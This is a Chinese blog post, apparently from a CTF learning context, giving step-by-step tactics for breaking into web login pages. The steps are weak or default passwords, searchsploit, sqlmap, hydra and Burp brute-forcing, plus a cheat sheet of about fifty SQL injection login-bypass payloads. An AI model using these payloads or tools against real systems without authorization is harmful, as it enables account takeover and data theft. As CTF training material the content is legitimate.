首页 > 其他分享 >CTF中网站用户登录页面渗透测试步骤

CTF中网站用户登录页面渗透测试步骤

时间:2022-12-24 12:12:37浏览次数:45  
标签:用户名 登录 admin 测试步骤 -- CTF 页面

CTF中网站用户登录页面渗透测试步骤

CTF测试中经常遇到靶机的HTTP服务需要用户认证才能登录其后台,因此很多情况下需要绕开登录的认证限制或者得到用户名密码信息。按照优先级,对CTF中网站用户登录按下面的步骤进行尝试:

  1. 用弱密码登录,比如admin, root, password等。

  2. 查看页面源代码,看是否有用户名密码等信息。

  3. 利用互联网搜索引擎查询靶机的CMS是否有默认的用户名和密码。

  4. 查看靶机的CMS是否有非认证(unauthenticated)的漏洞可以利用,直接拿到目标主机的shell,方法主要为:

    • Kali Linux上的searchsploit工具

    • 搜索引擎

  5. 看是否可以利用login bypass cheat sheet中语句尝试绕开登录验证机制。

    or 1=1
    or 1=1--
    or 1=1#
    or 1=1/*
    admin' --
    admin' #
    admin'/*
    admin' or '1'='1
    admin' or '1'='1'--
    admin' or '1'='1'#
    admin' or '1'='1'/*
    admin'or 1=1 or ''='
    admin' or 1=1
    admin' or 1=1--
    admin' or 1=1#
    admin' or 1=1/*
    admin') or ('1'='1
    admin') or ('1'='1'--
    admin') or ('1'='1'#
    admin') or ('1'='1'/*
    admin') or '1'='1
    admin') or '1'='1'--
    admin') or '1'='1'#
    admin') or '1'='1'/*
    1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
    admin" --
    admin" #
    admin"/*
    admin" or "1"="1
    admin" or "1"="1"--
    admin" or "1"="1"#
    admin" or "1"="1"/*
    admin"or 1=1 or ""="
    admin" or 1=1
    admin" or 1=1--
    admin" or 1=1#
    admin" or 1=1/*
    admin") or ("1"="1
    admin") or ("1"="1"--
    admin") or ("1"="1"#
    admin") or ("1"="1"/*
    admin") or "1"="1
    admin") or "1"="1"--
    admin") or "1"="1"#
    admin") or "1"="1"/*
    1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
    
  6. 利用SQLMAP工具看能力利用SQL注入漏洞拿到用户名和密码。

  7. 利用Burpsuite或者hydra工具对登录表单进行基于字典的破解。

标签:用户名,登录,admin,测试步骤,--,CTF,页面
From: https://www.cnblogs.com/jason-huawen/p/17002711.html

相关文章

  • 基于ZR.VUE 前端的改造,页面刷新报错
     问题描述:前后端分离开发,分开部署.页面刷新直接报404错误的解决办法提示: 先在 .env.development中配置 VUE_APP_BASE_API,将'/'替换为后端地址'http......
  • PDF页面大小不一样,怎样调整一致?
    PDF尺寸如何修改?PDF是Abode公司旗下开发用于跨平台支持多媒体集成信息的出版和发布,尤其是提供对网络信息发布支持的文档格式。使用PDF文档时,可能会遇到文档的纸张大小不一致......
  • cscctf_2019_qual_signal
    cscctf_2019_qual_signal总结没开pie,got表可写的时候,用magicgadget会有很好的效果多次调用ret2csu的时候注意利用重叠部分缩减payload可以通过read的返回值存储在rax......
  • requests访问https页面
     requests访问http很简单,但访问https页面时,需要设置是否验证服务器等情况。当验证服务器时需要指定根证书路径进行访问,不验证证书访问时会返回证书验证警告。 访问......
  • buuoj-pwn-gwctf_2019_shellcode
    buuoj-pwn-gwctf_2019_shellcode总结可见字符shellcode优先判断能不能利用\x00非预期一手题目分析IDA打开,看不了main函数,但是汇编也挺简单的,看看汇编就知道是打开沙......
  • 在WPF中嵌入WebBrowser可视化页面
    无论是哪种C/S技术,涉及数据可视化就非常的累赘了,当然大神也一定有,只不过面向大多数人,还是通过网页来实现,有的时候不想把这两个功能分开,一般会是客户的原因,所以我们打......
  • SpringBoot2.x系列教程25--整合SpringMVC之欢迎页面与自定义Favicon
    SpringBoot2.x系列教程25--整合SpringMVC之欢迎页面与自定义Favicon作者:一一哥一.SpringBoot设置欢迎页面1.默认欢迎页的源码在SpringBoot中,默认的欢迎界面是index.html,那......
  • 页面滚动 动画
     VueScrollRevealdelay:0,//延迟distance:'0px',//相对于原出现位置的距离duration:600,//动画多长时间完成easing:'cubic-bezier(0.5,0,......
  • 3.selenium的基本操作.py鼠标滑动到页面底部
    fromseleniumimportwebdriverfromtimeimportsleepbro=webdriver.Chrome(executable_path='chromedriver.exe')bro.get('https://www.jd.com/')sleep(1)#进行标签定......
  • PPT 常见的页面框架
    分割分列居中包围对称杂志https://www.bilibili.com/video/BV1ha411g7f5?p=19......